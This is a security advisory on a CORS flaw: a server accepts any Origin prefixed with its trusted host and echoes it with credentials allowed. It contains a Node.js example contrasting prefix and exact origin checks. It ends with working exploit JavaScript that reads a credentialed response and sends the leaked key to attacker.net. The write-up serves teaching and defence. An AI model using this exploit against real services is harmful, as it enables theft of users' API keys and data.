Host allows requests from hostnames that have the trusted host as a prefix (any suffix appended after it is accepted).
Severity: High
example.com trusts example.com.evil.com, which is an attacker-controlled domain.
In this scenario any suffix appended after example.com will be accepted by the server, because the origin check only tests whether the Origin header starts with the trusted host.
Vulnerable Implementation
GET /endpoint HTTP/1.1
Host: api.example.com
Origin: https://example.com.evil.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://example.com.evil.com
Access-Control-Allow-Credentials: true

{"[private API key]"}
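The following Node.js snippet is an added example, not code from the original write-up: it places the prefix-match origin check that produces the response above beside an exact allow-list check, and builds the CORS headers only when the check passes. The hosts api.example.com, example.com and example.com.evil.com come from the write-up; the function names, the allow-list contents (www.example.com in particular) and the probe origins are assumptions constructed for the demonstration.

```javascript
// Added example (not from the original write-up): CORS origin validation done
// wrong (string prefix) and right (exact origin allow-list). Function names and
// the allow-list are assumptions; the hostnames come from the write-up.

const TRUSTED_ORIGIN = 'https://example.com';

// Exact origins (scheme + host [+ non-default port]) allowed to read responses.
// Assumed allow-list for the demonstration.
const ALLOWED_ORIGINS = new Set(['https://example.com', 'https://www.example.com']);

// Vulnerable: a string prefix test. Anything appended after the trusted origin,
// such as "https://example.com.evil.com", still passes.
function isAllowedOriginVulnerable(origin) {
  return typeof origin === 'string' && origin.startsWith(TRUSTED_ORIGIN);
}

// Hardened: parse the Origin header and compare the normalised origin exactly.
// URL.origin is "scheme://host[:port]" with default ports dropped and no path,
// so a foreign registrable domain can never match.
function isAllowedOriginSafe(origin) {
  if (typeof origin !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch (e) {
    return false; // not a syntactically valid origin (e.g. the literal "null")
  }
  if (parsed.origin === 'null') return false; // opaque origins (file:, data:) are never trusted
  return ALLOWED_ORIGINS.has(parsed.origin);
}

// Builds the CORS response headers for a credentialed endpoint.
// The Origin is echoed back only when the supplied check accepts it, and
// Allow-Credentials is only ever sent alongside a concrete (non-wildcard) origin.
function corsHeaders(origin, isAllowed) {
  if (!isAllowed(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // caches must not serve one origin's response to another
  };
}

// Constructed Origin header values used to compare the two checks.
const PROBE_ORIGINS = [
  'https://example.com',
  'https://example.com.evil.com', // the write-up's attacker domain
  'https://example.com:443',      // default port: normalises to https://example.com
  'https://example.com:8443',     // non-default port: a different origin
  'http://example.com',           // wrong scheme
  'https://www.example.com',      // legitimate subdomain the prefix test misses
  'null',                         // sent by sandboxed frames and some redirects
];

// Returns, per probe, what each check decides; used for the table below.
function compareChecks() {
  return PROBE_ORIGINS.map((origin) => ({
    origin,
    vulnerable: isAllowedOriginVulnerable(origin),
    safe: isAllowedOriginSafe(origin),
  }));
}

for (const row of compareChecks()) {
  console.log(`${row.origin.padEnd(32)} prefix-match: ${row.vulnerable}  exact-match: ${row.safe}`);
}
```

Run with `node`. The table shows the prefix test accepting both `https://example.com.evil.com` and the unintended `https://example.com:8443`, while rejecting the legitimate `https://www.example.com`; the exact-match check does the opposite on all three. Reviewing a service for this bug therefore means reading the origin comparison, not just sending the one `example.com.evil.com` probe.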
Exploit
This exploit requires that the following JavaScript is hosted on example.com.evil.com, the origin the server reflects.
// Credentialed cross-origin request; the browser attaches the victim's cookies
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://api.example.com/endpoint', true);
req.withCredentials = true;
req.send();

// Because the server echoed the attacker origin with Allow-Credentials: true,
// the response body is readable from this page
function reqListener() {
  location = '//attacker.net/log?key=' + this.responseText;
}